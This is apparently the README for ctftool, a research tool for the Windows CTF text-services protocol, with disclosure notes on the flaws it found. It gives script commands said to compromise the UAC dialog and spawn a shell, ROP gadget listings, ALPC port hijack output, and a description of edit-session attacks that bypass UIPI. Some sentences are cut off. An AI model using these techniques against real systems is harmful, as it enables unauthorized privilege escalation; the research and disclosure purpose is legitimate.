`ctftool` is an interactive command line tool to experiment with CTF, a little-known protocol used on Windows to implement Text Services. This might be useful for studying Windows internals, debugging complex issues with Text Input Processors and analyzing Windows security.
`ctftool` can also be scripted for automating interaction with CTF clients or servers, or for performing simple fuzzing.
ctftool has been tested on Windows 7, Windows 8 and Windows 10. Both 32-bit and x64 versions are supported, but x64 has been tested more extensively.
There is online help for most commands, simply type `help` to see a list of commands, and `help <command>` to see detailed help for a particular command.

```
$ ./ctftool.exe
An interactive ctf exploration tool by @taviso.
Type "help" for available commands.
Most commands require a connection, see "help connect".
ctf> help
Type `help <command>` for help with a specific command.
Any line beginning with # is considered a comment.
help            - List available commands.
exit            - Exit the shell.
connect         - Connect to CTF ALPC Port.
info            - Query server informaiton.
scan            - Enumerate connected clients.
callstub        - Ask a client to invoke a function.
createstub      - Ask a client to instantiate CLSID.
hijack          - Attempt to hijack an ALPC server path.
sendinput       - Send keystrokes to thread.
setarg          - Marshal a parameter.
getarg          - Unmarshal a parameter.
wait            - Wait for a process and set it as the default thread.
thread          - Set the default thread.
sleep           - Sleep for specified milliseconds.
forget          - Forget all known stubs.
stack           - Print the last leaked stack ptr.
marshal         - Send command with marshalled parameters.
proxy           - Send command with proxy parameters.
call            - Send command without appended data.
window          - Create and register a message window.
patch           - Patch a marshalled parameter.
module          - Print the base address of a module.
module64        - Print the base address of a 64bit module.
editarg         - Change the type of a marshalled parameter.
symbol          - Lookup a symbol offset from ImageBase.
set             - Change or dump various ctftool parameters.
show            - Show the value of special variables you can use.
lock            - Lock the workstation, switch to Winlogon desktop.
repeat          - Repeat a command multiple times.
run             - Run a command.
script          - Source a script file.
print           - Print a string.
consent         - Invoke the UAC consent dialog.
reg             - Lookup a DWORD in the registry.
gadget          - Find the offset of a pattern in a file.
section         - Lookup property of PE section.
Most commands require a connection, see "help connect".
ctf>
```

The first thing you will want to do is connect to a session, and see which clients are connected.

```
ctf> connect
The ctf server port is located at \BaseNamedObjects\msctf.serverDefault1
NtAlpcConnectPort("\BaseNamedObjects\msctf.serverDefault1") => 0
Connected to CTF [email protected]\BaseNamedObjects\msctf.serverDefault1, Handle 00000264
ctf> scan
Client 0, Tid 3400 (Flags 0x08, Hwnd 00000D48, Pid 8696, explorer.exe)
Client 1, Tid 7692 (Flags 0x08, Hwnd 00001E0C, Pid 8696, explorer.exe)
Client 2, Tid 9424 (Flags 0x0c, Hwnd 000024D0, Pid 9344, SearchUI.exe)
Client 3, Tid 12068 (Flags 0x08, Hwnd 00002F24, Pid 12156, PROCEXP64.exe)
Client 4, Tid 9740 (Flags 0000, Hwnd 0000260C, Pid 3840, ctfmon.exe)
```

You can then experiment by sending and receiving commands to the server, or any of the connected clients.
If you don't want to build it yourself, check out the releases tab.

I used GNU make and Visual Studio 2019 to develop `ctftool`. Only 32-bit builds are supported, as this allows the tool to run on x86 and x64 Windows.

Running `make` in a developer command prompt should be enough. Fetch the submodules first:

```
git submodule update --init --recursive
```
This tool was used to discover many critical security problems with the CTF protocol that have existed for decades.

The examples only work on Windows 10 x64. All platforms and versions since Windows XP are affected, but no PoC is currently implemented.

Run `ctftool.exe` and enter this command:

```
An interactive ctf exploration tool by @taviso.
Type "help" for available commands.
Most commands require a connection, see "help connect".
ctf> script .\scripts\ctf-consent-system.ctf
```

This will wait for the UAC dialog to appear, compromise it and start a shell.
`thread` commands, or just

```
ctf> script .\scripts\ctf-exploit-common-win10.ctf
```
You can use `dumpbin /headers /loadconfig` to dump the whitelisted branch targets.
`(2^8 - 1) * len` decrements.

`.data` section. It needs to be part of an image so that I can predict where it will be mapped, as image randomization is per-boot on Windows.

The `msvcrt!_init_time` gadget was the best I could find: within a few instructions it dereferences NULL without corrupting any more memory. This means we can repeat it ad infinitum.
I found two useful gadgets for adjusting registers. The first was:

```
combase!CStdProxyBuffer_CF_AddRef:
    mov rcx,qword ptr [rcx-38h]
    mov rax,qword ptr [rcx]
    mov rax,qword ptr [rax+8]
    jmp qword ptr [combase!__guard_dispatch_icall_fptr]
```

And the second was:

```
MSCTF!CCompartmentEventSink::OnChange:
    mov rax,qword ptr [rcx+30h]
    mov rcx,qword ptr [rcx+38h]
    jmp qword ptr [MSCTF!_guard_dispatch_icall_fptr]
```

By combining these two gadgets with the object we formed with our write gadget, we can redirect execution to `kernel32!LoadLibraryA` by bouncing between them.
`sxd bpe` or the debugger will stop for every write!
Edit Session Attacks
Apart from memory corruption, a major vulnerability class exposed by CTF is edit session attacks. Normally, an unprivileged process (for example, low integrity) would not be permitted to send input to or read data from a high privileged process. This security boundary is called UIPI, User Interface Privilege Isolation.
CTF breaks these assumptions, and allows unprivileged processes to send input to privileged processes.
There are some requirements for this attack to work. As far as I'm aware, it will only work if you have a display language installed that uses an OoP TIP (out-of-process text input processor). Users with input languages that use IMEs (Chinese, Japanese, Korean, and so on) and users with a11y tools fall into this category.
Example attacks include...
`\BaseNamedObjects` can create the CTF ALPC port and pretend to be the monitor.

```
An interactive ctf exploration tool by @taviso.
Type "help" for available commands.
ctf> hijack Default 1
NtAlpcCreatePort("\BaseNamedObjects\msctf.serverDefault1") => 0 00000218
NtAlpcSendWaitReceivePort("\BaseNamedObjects\msctf.serverDefault1") => 0 00000218
000000: 18 00 30 00 0a 20 00 00 00 11 00 00 44 11 00 00 ..0.. ......D...
000010: a4 86 00 00 b7 66 b8 00 00 11 00 00 44 11 00 00 .....f......D...
000020: e7 12 01 00 0c 00 00 00 80 01 02 00 20 10 d6 05 ............ ...
A a message received
ProcessID: 4352, SearchUI.exe
ThreadId: 4420
WindowID: 00020180
NtAlpcSendWaitReceivePort("\BaseNamedObjects\msctf.serverDefault1") => 0 00000218
000000: 18 00 30 00 0a 20 00 00 ac 0f 00 00 0c 03 00 00 ..0.. ..........
000010: ec 79 00 00 fa 66 b8 00 ac 0f 00 00 0c 03 00 00 .y...f..........
000020: 12 04 01 00 08 00 00 00 10 01 01 00 00 00 00 00 ................
A a message received
ProcessID: 4012, explorer.exe
ThreadId: 780
WindowID: 00010110
NtAlpcSendWaitReceivePort("\BaseNamedObjects\msctf.serverDefault1") => 0 00000218
000000: 18 00 30 00 0a 20 00 00 ac 0f 00 00 0c 03 00 00 ..0.. ..........
000010: fc 8a 00 00 2a 67 b8 00 ac 0f 00 00 0c 03 00 00 ....*g..........
000020: 12 04 01 00 08 00 00 00 10 01 01 00 58 00 00 00 ............X...
A a message received
ProcessID: 4012, explorer.exe
ThreadId: 780
...
```
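The hijack dump above only labels ProcessID, ThreadId and WindowID. The following added example (not ctftool's own code) rebuilds the raw bytes from such a dump and extracts those fields, cross-checking them against the message length, so that captured messages can be attributed to a client process when triaging this kind of traffic. The field offsets are assumptions inferred from the two dumps above, not from any documented structure.

```python
"""Decode the CTF ALPC message header shown in the hijack dump above.

Added example, not part of ctftool. Field offsets are assumptions inferred only
from the two dumps above (u16 total length at 0x02, ProcessID at 0x08, ThreadId
at 0x0C, WindowID at 0x28, little-endian); the rest is left undecoded.
"""
import re
import struct
from typing import NamedTuple

# Sample input: the first message dump copied from the hijack output above.
SAMPLE_DUMP = """\
000000: 18 00 30 00 0a 20 00 00 00 11 00 00 44 11 00 00 ..0.. ......D...
000010: a4 86 00 00 b7 66 b8 00 00 11 00 00 44 11 00 00 .....f......D...
000020: e7 12 01 00 0c 00 00 00 80 01 02 00 20 10 d6 05 ............ ...
"""

# "offset:" followed by up to 16 hex bytes; the ASCII column is ignored.
HEX_LINE = re.compile(r"^\s*([0-9a-fA-F]{6}):((?:\s[0-9a-fA-F]{2}){1,16})")

class CtfHeader(NamedTuple):
    total_len: int
    pid: int
    tid: int
    hwnd: int

def parse_hexdump(text: str) -> bytes:
    """Rebuild the raw bytes from ctftool-style hex dump lines."""
    out = bytearray()
    for line in text.splitlines():
        m = HEX_LINE.match(line)
        if not m:
            continue  # banner, ProcessID/ThreadId lines, etc.
        if int(m.group(1), 16) != len(out):
            raise ValueError(f"non-contiguous dump at offset {m.group(1)}")
        out += bytes.fromhex(m.group(2))
    return bytes(out)

def decode_header(raw: bytes) -> CtfHeader:
    """Extract the labelled fields, rejecting truncated or inconsistent data."""
    if len(raw) < 0x2C:
        raise ValueError("message shorter than the assumed header")
    total_len = struct.unpack_from("<H", raw, 0x02)[0]
    if total_len != len(raw):
        raise ValueError(f"length field {total_len} != {len(raw)} captured bytes")
    pid, tid = struct.unpack_from("<II", raw, 0x08)
    hwnd = struct.unpack_from("<I", raw, 0x28)[0]
    return CtfHeader(total_len, pid, tid, hwnd)
```

Calling `decode_header(parse_hexdump(SAMPLE_DUMP))` yields pid 4352, tid 4420 and hwnd 0x00020180, matching the labels ctftool prints for that message.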
`ctftool` supports connecting to non-default sessions if you want to experiment with this attack.

```
An interactive ctf exploration tool by @taviso.
Type "help" for available commands.
Most commands require a connection, see "help connect".
ctf> help connect
Connect to CTF ALPC Port.
Usage: connect [DESKTOPNAME SESSIONID]
Without any parameters, connect to the ctf monitor for the current desktop and session.
All subsequent commands will use this connection for communicating with the ctf monitor.
If a connection is already open, the existing connection is closed first.
If DESKTOPNAME and SESSIONID are specified, a connection to ctf monitor for another desktop and session are opened, if it exists.
If the specified port does not exist, wait until it does exist. This is so that you can wait for a session that hasn't started yet in a script.
Examples
  Connect to the monitor for current desktop
    ctf> connect
  Connect to a specific desktop and session.
    ctf> connect Default 1
Most commands require a connection, see "help connect".
```
Supported Versions and Platforms
All versions of Windows since Windows XP use CTF, on all supported platforms.
While not part of the base system until XP, versions as early as Windows 98 and NT4 would use CTF if you installed Microsoft Office.
ctftool supports Windows 7 and later on x86 and x64, but earlier versions and other platforms could be supported, and contributions would be appreciated.
Microsoft doesn't document what CTF stands for; it's not explained in any of the Text Services documentation, SDK samples, symbol names, header files, or anywhere else. My theory is it's from `CTextFramework`, what you might name the class in Hungarian notation.
There are some websites that claim `ctfmon` has something to do with Clear Type Fonts or the Azure Collaborative Translation Framework. They're mistaken.
Update: Jake Nelson finds evidence for "Common Text Framework"
All original code is Apache 2.0, see the LICENSE file for details.
The following components are imported third party projects.
`GetProcAddress()` for 64-bit modules from a 32-bit process. This is used in the `symbol` command, and allows the same binary to work on x64 and x86.
Date: 2020-02-14 11:30:08